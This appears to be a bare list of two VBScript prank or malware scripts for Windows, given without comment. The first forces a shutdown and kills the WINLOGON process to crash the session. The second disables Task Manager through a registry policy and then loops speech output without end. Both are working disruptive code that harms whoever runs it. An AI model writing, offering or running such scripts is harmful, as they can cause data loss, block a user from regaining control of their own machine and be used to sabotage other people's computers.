1.
set ad=createobject("wscript.shell")
ad.run"cmd /c shutdown -s -t 60"
wscript.sleep 10
ad.Run "ntsd -c q -pn WINLOGON.exe"
2.
Set ws = CreateObject("WScript.Shell")
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\disabletaskmgr", 1, "REG_DWORD"
do
createobject("sapi.spvoice").speak"foolish"
loop